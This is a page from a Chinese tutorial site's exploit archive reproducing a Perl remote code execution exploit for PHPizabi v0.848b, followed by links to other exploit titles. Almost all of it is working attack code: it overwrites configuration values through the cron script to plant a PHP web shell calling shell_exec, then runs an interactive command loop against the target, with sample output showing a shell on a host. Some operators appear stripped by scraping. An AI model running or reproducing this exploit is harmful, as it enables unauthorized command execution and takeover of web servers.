手机
当前位置:查字典教程网 >网络安全 >Exploit >PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
摘要:#!/usr/bin/perl#inphex#PHPizabiv0.848bC1HFP1RemoteCodeExecution#http:/...

#!/usr/bin/perl

#inphex

#PHPizabi v0.848b C1 HFP1 Remote Code Execution

#http://www.dz-secure.com/tools/1/WebESploit.pl.txt

#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com

#system/v_cron_proc.php

# if (!function_exists("writeLogEntry")) {

# function writeLogEntry($data) {

# global $CONF;

#

# touch($CONF["CRON_LOGFILE"]);

#

# if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) {

# fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data n");

# fclose($handle);

# }

# }

# }

#

#

#writeLogEntry("Cron cycle started");

#writeLogEntry("Cron cycle ended");

########################################################

#overwritable:

#1.$CONF["CRON_LOGFILE"]

#2.$CONF["LOCALE_LONG_DATE_TIME"]

#

#date($CONF["LOCALE_LONG_DATE_TIME"]) ;

#solution:

#<?php

#echo date("a");

#?>

#returns: pm

#<?php

#echo date("a");

#?>

#returns: a

#seems logically eh?

#

#usage: perl ye.pl host /path/

#

## [C:]# perl ye.pl host /path/

## $[host]# id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

#

use LWP::UserAgent;

use HTTP::Cookies;

use Switch;

$hy = shift;

$host_ = "http://".$hy;

$path_ = shift;

$port = 80; #default

$info{'info'} = {

"description" => [""],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 0,

"cookie" =>

{

"cookie" => [""],

},

},

"sending_options" =>

{

"host" => $host_,

"path" => $path_."system/v_cron_proc.php",

"port" => $port,

"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",

"attack" =>

{

"CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"],

"CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]","<?php echo shell_exec($_GET[cmd]);exit;?>"], #nice eh?:)

},

},

};

&start($info{'info'},222);

while () {

print "$[".$hy."]#";

$cmd = <STDIN>;chomp($cmd);

$info{'info'} = {

"description" => [""],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 0,

"cookie" =>

{

"cookie" => [""],

},

},

"sending_options" =>

{

"host" => $host_,

"path" => $path_."system/yeee.php",

"port" => $port,

"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",

"attack" =>

{

"CONF[CRON_LOGFILE]" => ["get","cmd",$cmd],

},

},

};

&start($info{'info'},221);

print ${$info{'info'}}{221}{'content'}."n";

}

sub start

{

$a_ = shift;

$id = shift;

$post_dA = "";

$get_dA = get_d_p_s("get");

$post_dA = get_d_p_s("post");

my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);

$jj = 1;

$ii = 48;

$hh = 1;

$ppp = 0;

$s = shift;

$a = "";

$res_p = "";

$h = "";

$ua= "";

$agent= "";

$k= "";

$v= "";

$get_data= "";

$post_data= "";

$header_dA = "";

$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};

$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};

$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};

$method_m = $a_->{'sending_options'}{'method_a'};

$ua = LWP::UserAgent->new;

$ua->timeout($a_->{'options'}{'timeout'});

if ($a_->{'options'}{'proxy'}) {

$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});

}

$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";

$ua->agent($agent);

{

while (($k,$v) = each(%{$a_}))

{

if ($k ne "options" && $k ne "sending_options")

{

foreach $r (@{$a_->{$k}})

{

print $a_->{$k}[0];

}

}

}

foreach $j (@{$a_->{'options'}{'default_headers'}})

{

$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);

$m ;

}

if ($a_->{'options'}{'cookie'}{'cookie'}[0])

{

$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);

}

}

switch ($method_m)

{

case "attack" { &attack();}

case "SQL_INJECTION_BLIND" { &sql_injection_blind();}

case "REMOTE_COMMAND_EXECUTION" { &attack();}

case "REMOTE_CODE_EXECUTION" {&attack();}

case "REMOTE_FILE_INCLUSION" { &attack();}

case "LOCAL_FILE_INCLUSION" { &attack(); }

else { &attack(); }

}

sub attack

{

my ($jj);

my ($h);

my($x);

if ($post_dA eq "") {

$method = "get";

} elsif ($post_dA ne "")

{

$method = "post";

}

if ($method eq "get") {

$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

} elsif ($method eq "post")

{

$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

}

}

sub sql_injection_blind

{

while ()

{

while ($ii <= 120)

{

$itsx = "[".chr($ii)."]";

$l = length($itsx);

$b = ("b")x$l;

syswrite STDOUT,$b.$itsx;

if(check($ii,$hh) == 1)

{

syswrite STDOUT,$b.chr($ii)."---";

$hh ;

$chr = $chr.chr($ii);

}

$ii ;

}

push(@ffs,length($chr));

if (($#ffs - 999) == $ffs)

{

exit;

}

$ii = 48;

}

}

sub check($$)

{

my ($h);

my ($a);

$ii = shift;

$hh = shift;

if (get_d_p_s("post") ne "")

{

$method = "post";

} else { $method = "get";}

if ($method eq "get")

{

$ppp ;

$query = modify($get_dA,$ii,$hh);

$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 1;

} else { return 0;}

}

else

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 0;

}else { return 1;}

}

$h ;

}

} elsif ($method eq "post")

{

$ppp ;

$query_g = modify($get_dA,$ii,$hh);

$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

return 1;

}

else

{

return 0;

}

$h ;

}

}

}

sub modify($$$)

{

$string = shift;

$replace_by = shift;

$replace_by1 = shift;

if ($string !~/$i/ && $string !~/$h/) {

return $string;

} elsif ($string !~/$i/)

{

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

} elsif ($string !~/$h/)

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

return $string;

} else

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

}

}

sub get_d_p_s

{

$k = 0;

$v = 0;

$g_d_p_s = shift;

@post = ();

@get = ();

$post_data = "";

$get_data = "";

$header_data = "";

%header_dA = ();

$p = "";

$g = "";

while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))

{

if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)

{

$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {

$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")

{

$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];

}

}

if ($g_d_p_s eq "get")

{

return $g;

}

elsif ($g_d_p_s eq "post")

{

return $p;

} elsif ($g_d_p_s eq "header")

{

return %header_dA;

}

@a_ = ();

}

sub get_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

return $req->content;

}

sub post_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

$content_type = shift;

$send = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

$req->content_type($content_type);

$req->content($send);

$res = $ua->request($req);

return $res->content;

}

}

【PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit】相关文章:

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

精品推荐
分类导航